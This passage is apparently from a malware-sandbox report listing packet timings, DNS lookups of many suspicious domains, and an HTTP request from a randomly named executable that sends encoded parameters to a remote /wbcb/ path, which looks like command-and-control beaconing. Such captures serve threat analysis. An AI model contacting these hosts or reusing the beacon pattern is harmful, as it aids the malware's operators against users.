                                                                                  Nov 20, 2024 08:34:50.210535049 CET8050040172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:50.722913027 CET8050040172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:50.722997904 CET8050040172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:50.723072052 CET5004080192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:50.723236084 CET8050040172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:50.723289967 CET5004080192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:51.721496105 CET5004080192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:52.736944914 CET5004180192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:52.742053032 CET8050041172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:52.742129087 CET5004180192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:52.758469105 CET5004180192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:52.763530016 CET8050041172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:52.763545036 CET8050041172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:53.275191069 CET8050041172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:53.275213003 CET8050041172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:53.275782108 CET8050041172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:53.275913000 CET5004180192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:54.265259027 CET5004180192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:55.289839983 CET5004380192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:55.295047045 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:55.295167923 CET5004380192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:55.305727005 CET5004380192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:55.310594082 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:55.824734926 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:55.824788094 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:55.824821949 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:55.824857950 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:55.824857950 CET5004380192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:55.824889898 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:55.824922085 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:55.824954033 CET5004380192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:55.824956894 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:55.824985027 CET5004380192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:55.825069904 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:55.825103045 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:55.825128078 CET5004380192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:55.825136900 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:55.825180054 CET5004380192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:55.829943895 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:55.830002069 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:55.830097914 CET5004380192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:55.832968950 CET5004380192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:55.837898016 CET8050043172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:35:00.907393932 CET5004480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:00.912421942 CET805004413.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:00.919388056 CET5004480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:00.930579901 CET5004480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:00.935570002 CET805004413.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:01.374111891 CET805004413.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:01.374224901 CET5004480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:02.436918020 CET5004480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:02.442011118 CET805004413.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:03.455904007 CET5004580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:03.460891962 CET805004513.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:03.461035967 CET5004580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:03.477396011 CET5004580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:03.482243061 CET805004513.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:03.940217018 CET805004513.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:03.940299034 CET5004580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:04.983880043 CET5004580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:04.988851070 CET805004513.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:06.003413916 CET5004680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:06.008604050 CET805004613.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:06.008690119 CET5004680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:06.026964903 CET5004680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:06.031779051 CET805004613.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:06.031903028 CET805004613.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:06.479614973 CET805004613.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:06.479706049 CET5004680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:07.531467915 CET5004680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:07.536583900 CET805004613.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:08.549774885 CET5004780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:08.554855108 CET805004713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:08.554977894 CET5004780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:08.565615892 CET5004780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:08.570549011 CET805004713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:09.013777971 CET805004713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:09.013822079 CET805004713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:09.015592098 CET5004780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:09.019412994 CET5004780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:35:09.024317980 CET805004713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:35:14.080408096 CET5004880192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:14.085381031 CET8050048104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:14.085447073 CET5004880192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:14.099303007 CET5004880192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:14.104445934 CET8050048104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:14.776777029 CET8050048104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:14.777601004 CET8050048104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:14.777692080 CET5004880192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:15.608818054 CET5004880192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:16.627307892 CET5004980192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:16.632365942 CET8050049104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:16.632456064 CET5004980192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:16.647392988 CET5004980192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:16.652509928 CET8050049104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:17.312531948 CET8050049104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:17.312782049 CET8050049104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:17.312999010 CET5004980192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:18.155643940 CET5004980192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:19.179107904 CET5005080192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:19.184124947 CET8050050104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:19.189707041 CET5005080192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:19.205195904 CET5005080192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:19.210218906 CET8050050104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:19.210305929 CET8050050104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:19.855067968 CET8050050104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:19.855386972 CET8050050104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:19.855577946 CET8050050104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:19.858912945 CET5005080192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:20.718260050 CET5005080192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:21.737569094 CET5005180192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:21.742712021 CET8050051104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:21.743494987 CET5005180192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:21.755423069 CET5005180192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:21.760461092 CET8050051104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:22.429676056 CET8050051104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:22.429867029 CET8050051104.21.4.93192.168.2.6
                                                                                  Nov 20, 2024 08:35:22.429915905 CET5005180192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:22.433351994 CET5005180192.168.2.6104.21.4.93
                                                                                  Nov 20, 2024 08:35:22.438302994 CET8050051104.21.4.93192.168.2.6

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 20, 2024 08:31:49.013951063 CET5314653192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:31:49.062800884 CET53531461.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:32:04.789263010 CET5929453192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:32:04.846648932 CET53592941.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:32:18.080279112 CET6088253192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:32:18.548911095 CET53608821.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:32:32.191608906 CET5478553192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:32:32.203069925 CET53547851.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:32:45.456099987 CET5462453192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:32:45.562450886 CET53546241.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:32:58.986675978 CET6034553192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:32:59.024373055 CET53603451.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:33:12.618695021 CET5361853192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:33:12.633970022 CET53536181.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:33:26.018661976 CET5593253192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:33:26.048413992 CET53559321.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.331423998 CET6342053192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:33:39.370965004 CET53634201.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:33:52.739272118 CET5873753192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:33:53.749339104 CET5873753192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:33:53.832842112 CET53587371.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:33:53.832884073 CET53587371.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:34:07.379292011 CET6027253192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:34:07.694067001 CET53602721.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:34:21.128729105 CET5300753192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:34:21.147069931 CET53530071.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:34:34.364387035 CET4916653192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:34:34.419022083 CET53491661.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:34:47.551389933 CET5025553192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:34:47.589750051 CET53502551.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:35:00.847412109 CET5677753192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:35:00.900012970 CET53567771.1.1.1192.168.2.6
                                                                                  Nov 20, 2024 08:35:14.034126997 CET5536853192.168.2.61.1.1.1
                                                                                  Nov 20, 2024 08:35:14.077846050 CET53553681.1.1.1192.168.2.6

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Nov 20, 2024 08:31:49.013951063 CET192.168.2.61.1.1.10x4f5Standard query (0)www.aziziyeescortg.xyzA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:04.789263010 CET192.168.2.61.1.1.10x8c9Standard query (0)www.grandesofertas.funA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:18.080279112 CET192.168.2.61.1.1.10x25f7Standard query (0)www.sankan-fukushi.infoA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:32.191608906 CET192.168.2.61.1.1.10xdc8fStandard query (0)www.conansog.shopA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:45.456099987 CET192.168.2.61.1.1.10xbbf6Standard query (0)www.beythome.onlineA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:58.986675978 CET192.168.2.61.1.1.10xc3d3Standard query (0)www.tempatmudisini06.clickA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:12.618695021 CET192.168.2.61.1.1.10x7568Standard query (0)www.questmatch.proA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:26.018661976 CET192.168.2.61.1.1.10x892dStandard query (0)www.callyur.shopA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:39.331423998 CET192.168.2.61.1.1.10x42c2Standard query (0)www.housew.websiteA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:52.739272118 CET192.168.2.61.1.1.10x8f3dStandard query (0)www.nuy25c9t.sbsA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.749339104 CET192.168.2.61.1.1.10x8f3dStandard query (0)www.nuy25c9t.sbsA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:34:07.379292011 CET192.168.2.61.1.1.10x88d9Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:34:21.128729105 CET192.168.2.61.1.1.10xb6f0Standard query (0)www.a1shop.shopA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:34:34.364387035 CET192.168.2.61.1.1.10x1c58Standard query (0)www.aiactor.xyzA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:34:47.551389933 CET192.168.2.61.1.1.10x21aStandard query (0)www.sitioseguro.blogA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:35:00.847412109 CET192.168.2.61.1.1.10x5951Standard query (0)www.optimismbank.xyzA (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:35:14.034126997 CET192.168.2.61.1.1.10x849bStandard query (0)www.nonpressure.beautyA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Nov 20, 2024 08:31:49.062800884 CET1.1.1.1192.168.2.60x4f5No error (0)www.aziziyeescortg.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:31:49.062800884 CET1.1.1.1192.168.2.60x4f5No error (0)www.aziziyeescortg.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:04.846648932 CET1.1.1.1192.168.2.60x8c9No error (0)www.grandesofertas.funentri-domains.clickmax.ioCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:04.846648932 CET1.1.1.1192.168.2.60x8c9No error (0)entri-domains.clickmax.iossl.goentri.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:04.846648932 CET1.1.1.1192.168.2.60x8c9No error (0)ssl.goentri.com76.223.74.74A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:04.846648932 CET1.1.1.1192.168.2.60x8c9No error (0)ssl.goentri.com13.248.221.243A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:18.548911095 CET1.1.1.1192.168.2.60x25f7No error (0)www.sankan-fukushi.info163.44.185.183A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:32.203069925 CET1.1.1.1192.168.2.60xdc8fNo error (0)www.conansog.shop172.67.162.12A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:32.203069925 CET1.1.1.1192.168.2.60xdc8fNo error (0)www.conansog.shop104.21.41.74A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:45.562450886 CET1.1.1.1192.168.2.60xbbf6No error (0)www.beythome.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:45.562450886 CET1.1.1.1192.168.2.60xbbf6No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:45.562450886 CET1.1.1.1192.168.2.60xbbf6No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:59.024373055 CET1.1.1.1192.168.2.60xc3d3No error (0)www.tempatmudisini06.clicktempatmudisini06.clickCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:32:59.024373055 CET1.1.1.1192.168.2.60xc3d3No error (0)tempatmudisini06.click103.21.221.4A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:12.633970022 CET1.1.1.1192.168.2.60x7568No error (0)www.questmatch.pro188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:12.633970022 CET1.1.1.1192.168.2.60x7568No error (0)www.questmatch.pro188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:26.048413992 CET1.1.1.1192.168.2.60x892dNo error (0)www.callyur.shopcallyur.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:26.048413992 CET1.1.1.1192.168.2.60x892dNo error (0)callyur.shop66.29.137.10A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:39.370965004 CET1.1.1.1192.168.2.60x42c2No error (0)www.housew.website203.161.46.205A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832842112 CET1.1.1.1192.168.2.60x8f3dNo error (0)www.nuy25c9t.sbsb1-3-r11-gmhudx.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832842112 CET1.1.1.1192.168.2.60x8f3dNo error (0)b1-3-r11-gmhudx.t9d2quy5.shopb1-3-r11.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832842112 CET1.1.1.1192.168.2.60x8f3dNo error (0)b1-3-r11.t9d2quy5.shopb1-3-r111-s65psj.8uqm5xgy.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832842112 CET1.1.1.1192.168.2.60x8f3dNo error (0)b1-3-r111-s65psj.8uqm5xgy.shopb1-3-r11-nff52.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832842112 CET1.1.1.1192.168.2.60x8f3dNo error (0)b1-3-r11-nff52.alicloudddos.topb1-3-r111-s65psj.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832842112 CET1.1.1.1192.168.2.60x8f3dNo error (0)b1-3-r111-s65psj.alicloudddos.topb1-3-r111-55g56.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832842112 CET1.1.1.1192.168.2.60x8f3dNo error (0)b1-3-r111-55g56.kunlundns.topb1-3-r111.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832842112 CET1.1.1.1192.168.2.60x8f3dNo error (0)b1-3-r111.kunlundns.top43.155.76.124A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832884073 CET1.1.1.1192.168.2.60x8f3dNo error (0)www.nuy25c9t.sbsb1-3-r11-gmhudx.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832884073 CET1.1.1.1192.168.2.60x8f3dNo error (0)b1-3-r11-gmhudx.t9d2quy5.shopb1-3-r11.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832884073 CET1.1.1.1192.168.2.60x8f3dNo error (0)b1-3-r11.t9d2quy5.shopb1-3-r111-s65psj.8uqm5xgy.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832884073 CET1.1.1.1192.168.2.60x8f3dNo error (0)b1-3-r111-s65psj.8uqm5xgy.shopb1-3-r11-nff52.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832884073 CET1.1.1.1192.168.2.60x8f3dNo error (0)b1-3-r11-nff52.alicloudddos.topb1-3-r111-s65psj.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832884073 CET1.1.1.1192.168.2.60x8f3dNo error (0)b1-3-r111-s65psj.alicloudddos.topb1-3-r111-55g56.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832884073 CET1.1.1.1192.168.2.60x8f3dNo error (0)b1-3-r111-55g56.kunlundns.topb1-3-r111.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 20, 2024 08:33:53.832884073 CET1.1.1.1192.168.2.60x8f3dNo error (0)b1-3-r111.kunlundns.top43.155.76.124A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:34:07.694067001 CET1.1.1.1192.168.2.60x88d9No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:34:21.147069931 CET1.1.1.1192.168.2.60xb6f0No error (0)www.a1shop.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:34:21.147069931 CET1.1.1.1192.168.2.60xb6f0No error (0)www.a1shop.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:34:34.419022083 CET1.1.1.1192.168.2.60x1c58No error (0)www.aiactor.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:34:34.419022083 CET1.1.1.1192.168.2.60x1c58No error (0)www.aiactor.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:34:47.589750051 CET1.1.1.1192.168.2.60x21aNo error (0)www.sitioseguro.blog172.67.162.39A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:34:47.589750051 CET1.1.1.1192.168.2.60x21aNo error (0)www.sitioseguro.blog104.21.15.100A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:35:00.900012970 CET1.1.1.1192.168.2.60x5951No error (0)www.optimismbank.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:35:00.900012970 CET1.1.1.1192.168.2.60x5951No error (0)www.optimismbank.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:35:14.077846050 CET1.1.1.1192.168.2.60x849bNo error (0)www.nonpressure.beauty104.21.4.93A (IP address)IN (0x0001)false
                                                                                  Nov 20, 2024 08:35:14.077846050 CET1.1.1.1192.168.2.60x849bNo error (0)www.nonpressure.beauty172.67.131.229A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.aziziyeescortg.xyz
                                                                                  • www.grandesofertas.fun
                                                                                  • www.sankan-fukushi.info
                                                                                  • www.conansog.shop
                                                                                  • www.beythome.online
                                                                                  • www.tempatmudisini06.click
                                                                                  • www.questmatch.pro
                                                                                  • www.callyur.shop
                                                                                  • www.housew.website
                                                                                  • www.nuy25c9t.sbs
                                                                                  • www.madhf.tech
                                                                                  • www.a1shop.shop
                                                                                  • www.aiactor.xyz
                                                                                  • www.sitioseguro.blog
                                                                                  • www.optimismbank.xyz
                                                                                  • www.nonpressure.beauty

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.649872188.114.96.3803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:31:49.084477901 CET560OUTGET /wbcb/?9xn=fHadNpk8MVax&GR54yHZ8=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K07oOsp/5ysfwWmAOXTj0WnbyU/nOpjct5usIHCkjfDMsHKGZFI= HTTP/1.1
                                                                                  Host: www.aziziyeescortg.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:31:49.721586943 CET1101INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:31:49 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jv1Yjc7qorQkIAKyPansiI5oqvUUETMy1uuq4ctnrDLXcEOcc2xNUxD0SYuCrqvz2Sp2MLN87KyiJYVwhTPeZ7RbXy7NDIbj5DCJSx45sg%2BUMXayoAC3rxjtgA2%2Fntdc3%2BhxwwSlqixg"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56be1a4d79c44f-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1453&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=560&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
